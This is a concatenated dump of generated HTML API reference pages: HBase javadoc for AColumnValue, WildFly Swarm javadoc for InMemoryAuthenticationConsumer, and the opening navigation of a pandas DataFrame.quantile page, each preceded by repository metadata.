testdata/goldens/dotnet/Google.Cloud.Asset.V1.TemporalAsset.Types.html
HTML
apache-2.0
1,451
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_45) on Tue Apr 22 01:43:54 UTC 2014 --> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> Uses of Class org.apache.hadoop.hbase.avro.generated.AColumnValue (HBase 0.94.19 API) </TITLE> <META NAME="date" CONTENT="2014-04-22"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class org.apache.hadoop.hbase.avro.generated.AColumnValue (HBase 0.94.19 API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../org/apache/hadoop/hbase/avro/generated/AColumnValue.html" title="class in org.apache.hadoop.hbase.avro.generated"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../../index.html?org/apache/hadoop/hbase/avro/generated//class-useAColumnValue.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="AColumnValue.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Uses of Class<br>org.apache.hadoop.hbase.avro.generated.AColumnValue</B></H2> </CENTER> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Packages that use <A HREF="../../../../../../../org/apache/hadoop/hbase/avro/generated/AColumnValue.html" title="class in org.apache.hadoop.hbase.avro.generated">AColumnValue</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.apache.hadoop.hbase.avro.generated"><B>org.apache.hadoop.hbase.avro.generated</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.apache.hadoop.hbase.avro.generated"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Uses of <A HREF="../../../../../../../org/apache/hadoop/hbase/avro/generated/AColumnValue.html" title="class in org.apache.hadoop.hbase.avro.generated">AColumnValue</A> in <A HREF="../../../../../../../org/apache/hadoop/hbase/avro/generated/package-summary.html">org.apache.hadoop.hbase.avro.generated</A></FONT></TH> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left" COLSPAN="2">Fields in <A HREF="../../../../../../../org/apache/hadoop/hbase/avro/generated/package-summary.html">org.apache.hadoop.hbase.avro.generated</A> with type parameters of type <A HREF="../../../../../../../org/apache/hadoop/hbase/avro/generated/AColumnValue.html" title="class in org.apache.hadoop.hbase.avro.generated">AColumnValue</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="http://java.sun.com/javase/6/docs/api/java/util/List.html?is-external=true" title="class or interface in java.util">List</A>&lt;<A HREF="../../../../../../../org/apache/hadoop/hbase/avro/generated/AColumnValue.html" title="class in org.apache.hadoop.hbase.avro.generated">AColumnValue</A>&gt;</CODE></FONT></TD> <TD><CODE><B>APut.</B><B><A HREF="../../../../../../../org/apache/hadoop/hbase/avro/generated/APut.html#columnValues">columnValues</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../org/apache/hadoop/hbase/avro/generated/AColumnValue.html" title="class in org.apache.hadoop.hbase.avro.generated"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../../index.html?org/apache/hadoop/hbase/avro/generated//class-useAColumnValue.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="AColumnValue.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> Copyright &#169; 2014 <a href="http://www.apache.org/">The Apache Software Foundation</a>. All Rights Reserved. </BODY> </HTML>
axfcampos/hbase-0.94.19
docs/apidocs/org/apache/hadoop/hbase/avro/generated/class-use/AColumnValue.html
HTML
apache-2.0
8,625
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_112) on Fri Jun 16 09:55:07 MST 2017 --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>InMemoryAuthenticationConsumer (Public javadocs 2017.6.1 API)</title> <meta name="date" content="2017-06-16"> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="InMemoryAuthenticationConsumer (Public javadocs 2017.6.1 API)"; } } catch(err) { } //--> var methods = {"i0":6}; var tabs = {65535:["t0","All Methods"],2:["t2","Instance Methods"],4:["t3","Abstract Methods"]}; var altColor = "altColor"; var rowColor = "rowColor"; var tableTab = "tableTab"; var activeTableTab = "activeTableTab"; </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/InMemoryAuthenticationConsumer.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage">WildFly Swarm API, 2017.6.1</div> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../org/wildfly/swarm/management/InMemoryAuthentication.html" title="class in org.wildfly.swarm.management"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../../org/wildfly/swarm/management/InMemoryAuthorization.html" title="class in org.wildfly.swarm.management"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/wildfly/swarm/management/InMemoryAuthenticationConsumer.html" target="_top">Frames</a></li> <li><a href="InMemoryAuthenticationConsumer.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">org.wildfly.swarm.management</div> <h2 title="Interface InMemoryAuthenticationConsumer" class="title">Interface InMemoryAuthenticationConsumer</h2> </div> <div class="contentContainer"> <div class="description"> <ul class="blockList"> <li class="blockList"> <dl> <dt>Functional Interface:</dt> <dd>This is a functional interface and can therefore be used as the assignment target for a lambda expression or method reference.</dd> </dl> <hr> <br> <pre><a href="http://docs.oracle.com/javase/8/docs/api/java/lang/FunctionalInterface.html?is-external=true" title="class or interface in java.lang">@FunctionalInterface</a> public interface <span class="typeNameLabel">InMemoryAuthenticationConsumer</span></pre> <dl> <dt><span class="simpleTagLabel">Author:</span></dt> <dd>Bob McWhirter</dd> </dl> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method.summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd">&nbsp;</span></span><span id="t2" class="tableTab"><span><a href="javascript:show(2);">Instance Methods</a></span><span class="tabEnd">&nbsp;</span></span><span id="t3" class="tableTab"><span><a href="javascript:show(4);">Abstract Methods</a></span><span class="tabEnd">&nbsp;</span></span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr id="i0" class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../org/wildfly/swarm/management/InMemoryAuthenticationConsumer.html#accept-org.wildfly.swarm.management.InMemoryAuthentication-">accept</a></span>(<a href="../../../../org/wildfly/swarm/management/InMemoryAuthentication.html" title="class in org.wildfly.swarm.management">InMemoryAuthentication</a>&nbsp;authn)</code>&nbsp;</td> </tr> </table> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method.detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="accept-org.wildfly.swarm.management.InMemoryAuthentication-"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>accept</h4> <pre>void&nbsp;accept(<a href="../../../../org/wildfly/swarm/management/InMemoryAuthentication.html" title="class in org.wildfly.swarm.management">InMemoryAuthentication</a>&nbsp;authn)</pre> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/InMemoryAuthenticationConsumer.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage">WildFly Swarm API, 2017.6.1</div> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../org/wildfly/swarm/management/InMemoryAuthentication.html" title="class in org.wildfly.swarm.management"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../../org/wildfly/swarm/management/InMemoryAuthorization.html" title="class in org.wildfly.swarm.management"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/wildfly/swarm/management/InMemoryAuthenticationConsumer.html" target="_top">Frames</a></li> <li><a href="InMemoryAuthenticationConsumer.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &#169; 2017 <a href="http://www.jboss.org">JBoss by Red Hat</a>. All rights reserved.</small></p> </body> </html>
wildfly-swarm/wildfly-swarm-javadocs
2017.6.1/apidocs/org/wildfly/swarm/management/InMemoryAuthenticationConsumer.html
HTML
apache-2.0
8,980
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>pandas.DataFrame.quantile &#8212; pandas 0.24.0.dev0+81.g8d5032a8c.dirty documentation</title> <link rel="stylesheet" href="../_static/nature.css" type="text/css" /> <link rel="stylesheet" href="../_static/pygments.css" type="text/css" /> <script type="text/javascript" id="documentation_options" data-url_root="../" src="../_static/documentation_options.js"></script> <script type="text/javascript" src="../_static/jquery.js"></script> <script type="text/javascript" src="../_static/underscore.js"></script> <script type="text/javascript" src="../_static/doctools.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script> <link rel="index" title="Index" href="../genindex.html" /> <link rel="search" title="Search" href="../search.html" /> <link rel="next" title="pandas.DataFrame.query" href="pandas.DataFrame.query.html" /> <link rel="prev" title="pandas.DataFrame.product" href="pandas.DataFrame.product.html" /> </head><body> <div class="related" role="navigation" aria-label="related navigation"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../genindex.html" title="General Index" accesskey="I">index</a></li> <li class="right" > <a href="../py-modindex.html" title="Python Module Index" >modules</a> |</li> <li class="right" > <a href="pandas.DataFrame.query.html" title="pandas.DataFrame.query" accesskey="N">next</a> |</li> <li class="right" > <a href="pandas.DataFrame.product.html" title="pandas.DataFrame.product" accesskey="P">previous</a> |</li> <li class="nav-item nav-item-0"><a href="../index.html">pandas 0.24.0.dev0+81.g8d5032a8c.dirty documentation</a> &#187;</li> <li class="nav-item nav-item-1"><a href="../api.html" >API Reference</a> &#187;</li> <li class="nav-item nav-item-2"><a href="pandas.DataFrame.html" accesskey="U">pandas.DataFrame</a> &#187;</li> </ul> </div> <div class="content-wrapper"> <div class="content"> <div class="document"> <div class="sphinxsidebar"> <h3>Table Of Contents</h3> <ul class="current"> <li class="toctree-l1"><a class="reference internal" href="../whatsnew.html">What’s New</a></li> <li class="toctree-l1"><a class="reference internal" href="../install.html">Installation</a></li> <li class="toctree-l1"><a class="reference internal" href="../contributing.html">Contributing to pandas</a></li> <li class="toctree-l1"><a class="reference internal" href="../overview.html">Package overview</a></li> <li class="toctree-l1"><a class="reference internal" href="../10min.html">10 Minutes to pandas</a></li> <li class="toctree-l1"><a class="reference internal" href="../tutorials.html">Tutorials</a></li> <li class="toctree-l1"><a class="reference internal" href="../cookbook.html">Cookbook</a></li> <li class="toctree-l1"><a class="reference internal" href="../dsintro.html">Intro to Data Structures</a></li> <li class="toctree-l1"><a class="reference internal" href="../basics.html">Essential Basic Functionality</a></li> <li class="toctree-l1"><a class="reference internal" href="../text.html">Working with Text Data</a></li> <li class="toctree-l1"><a class="reference internal" href="../options.html">Options and Settings</a></li> <li class="toctree-l1"><a class="reference internal" href="../indexing.html">Indexing and Selecting Data</a></li> <li class="toctree-l1"><a class="reference internal" href="../advanced.html">MultiIndex / Advanced Indexing</a></li> <li class="toctree-l1"><a class="reference internal" href="../computation.html">Computational tools</a></li> <li class="toctree-l1"><a class="reference internal" href="../missing_data.html">Working with missing data</a></li> <li class="toctree-l1"><a class="reference internal" href="../groupby.html">Group By: split-apply-combine</a></li> <li class="toctree-l1"><a class="reference internal" href="../merging.html">Merge, join, and concatenate</a></li> <li class="toctree-l1"><a class="reference internal" href="../reshaping.html">Reshaping and Pivot Tables</a></li> <li class="toctree-l1"><a class="reference internal" href="../timeseries.html">Time Series / Date functionality</a></li> <li class="toctree-l1"><a class="reference internal" href="../timedeltas.html">Time Deltas</a></li> <li class="toctree-l1"><a class="reference internal" href="../categorical.html">Categorical Data</a></li> <li class="toctree-l1"><a class="reference internal" href="../visualization.html">Visualization</a></li> <li class="toctree-l1"><a class="reference internal" href="../style.html">Styling</a></li> <li class="toctree-l1"><a class="reference internal" href="../io.html">IO Tools (Text, CSV, HDF5, …)</a></li> <li class="toctree-l1"><a class="reference internal" href="../enhancingperf.html">Enhancing Performance</a></li> <li class="toctree-l1"><a class="reference internal" href="../sparse.html">Sparse data structures</a></li> <li class="toctree-l1"><a class="reference internal" href="../gotchas.html">Frequently Asked Questions (FAQ)</a></li> <li class="toctree-l1"><a class="reference internal" href="../r_interface.html">rpy2 / R interface</a></li> <li class="toctree-l1"><a class="reference internal" href="../ecosystem.html">pandas Ecosystem</a></li> <li class="toctree-l1"><a class="reference internal" href="../comparison_with_r.html">Comparison with R / R libraries</a></li> <li class="toctree-l1"><a class="reference internal" href="../comparison_with_sql.html">Comparison with SQL</a></li> <li class="toctree-l1"><a class="reference internal" href="../comparison_with_sas.html">Comparison with SAS</a></li> <li class="toctree-l1"><a class="reference internal" href="../comparison_with_stata.html">Comparison with Stata</a></li> <li class="toctree-l1 current"><a class="reference internal" href="../api.html">API Reference</a><ul class="current"> <li class="toctree-l2"><a class="reference internal" href="../api.html#input-output">Input/Output</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#general-functions">General functions</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#series">Series</a></li> <li class="toctree-l2 current"><a class="reference internal" href="../api.html#dataframe">DataFrame</a><ul class="current"> <li class="toctree-l3"><a class="reference internal" href="../api.html#id1">Constructor</a></li> <li class="toctree-l3"><a class="reference internal" href="../api.html#attributes-and-underlying-data">Attributes and underlying data</a></li> <li class="toctree-l3"><a class="reference internal" href="../api.html#id2">Conversion</a></li> <li class="toctree-l3"><a class="reference internal" href="../api.html#id3">Indexing, iteration</a></li> <li class="toctree-l3"><a class="reference internal" href="../api.html#id4">Binary operator functions</a></li> <li class="toctree-l3"><a class="reference internal" href="../api.html#id5">Function application, GroupBy &amp; Window</a></li> <li class="toctree-l3 current"><a class="reference internal" href="../api.html#api-dataframe-stats">Computations / Descriptive Stats</a><ul class="current"> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.abs.html">pandas.DataFrame.abs</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.all.html">pandas.DataFrame.all</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.any.html">pandas.DataFrame.any</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.clip.html">pandas.DataFrame.clip</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.clip_lower.html">pandas.DataFrame.clip_lower</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.clip_upper.html">pandas.DataFrame.clip_upper</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.compound.html">pandas.DataFrame.compound</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.corr.html">pandas.DataFrame.corr</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.corrwith.html">pandas.DataFrame.corrwith</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.count.html">pandas.DataFrame.count</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.cov.html">pandas.DataFrame.cov</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.cummax.html">pandas.DataFrame.cummax</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.cummin.html">pandas.DataFrame.cummin</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.cumprod.html">pandas.DataFrame.cumprod</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.cumsum.html">pandas.DataFrame.cumsum</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.describe.html">pandas.DataFrame.describe</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.diff.html">pandas.DataFrame.diff</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.eval.html">pandas.DataFrame.eval</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.kurt.html">pandas.DataFrame.kurt</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.kurtosis.html">pandas.DataFrame.kurtosis</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.mad.html">pandas.DataFrame.mad</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.max.html">pandas.DataFrame.max</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.mean.html">pandas.DataFrame.mean</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.median.html">pandas.DataFrame.median</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.min.html">pandas.DataFrame.min</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.mode.html">pandas.DataFrame.mode</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.pct_change.html">pandas.DataFrame.pct_change</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.prod.html">pandas.DataFrame.prod</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.product.html">pandas.DataFrame.product</a></li> <li class="toctree-l4 current"><a class="current reference internal" href="#">pandas.DataFrame.quantile</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.rank.html">pandas.DataFrame.rank</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.round.html">pandas.DataFrame.round</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.sem.html">pandas.DataFrame.sem</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.skew.html">pandas.DataFrame.skew</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.sum.html">pandas.DataFrame.sum</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.std.html">pandas.DataFrame.std</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.var.html">pandas.DataFrame.var</a></li> <li class="toctree-l4"><a class="reference internal" href="pandas.DataFrame.nunique.html">pandas.DataFrame.nunique</a></li> </ul> </li> <li class="toctree-l3"><a class="reference internal" href="../api.html#id7">Reindexing / Selection / Label manipulation</a></li> <li class="toctree-l3"><a class="reference internal" href="../api.html#api-dataframe-missing">Missing data handling</a></li> <li class="toctree-l3"><a class="reference internal" href="../api.html#reshaping-sorting-transposing">Reshaping, sorting, transposing</a></li> <li class="toctree-l3"><a class="reference internal" href="../api.html#id9">Combining / joining / merging</a></li> <li class="toctree-l3"><a class="reference internal" href="../api.html#id10">Time series-related</a></li> <li class="toctree-l3"><a class="reference internal" href="../api.html#api-dataframe-plotting">Plotting</a></li> <li class="toctree-l3"><a class="reference internal" href="../api.html#id12">Serialization / IO / Conversion</a></li> <li class="toctree-l3"><a class="reference internal" href="../api.html#id13">Sparse</a></li> </ul> </li> <li class="toctree-l2"><a class="reference internal" href="../api.html#panel">Panel</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#index">Index</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#numeric-index">Numeric Index</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#categoricalindex">CategoricalIndex</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#intervalindex">IntervalIndex</a></li> 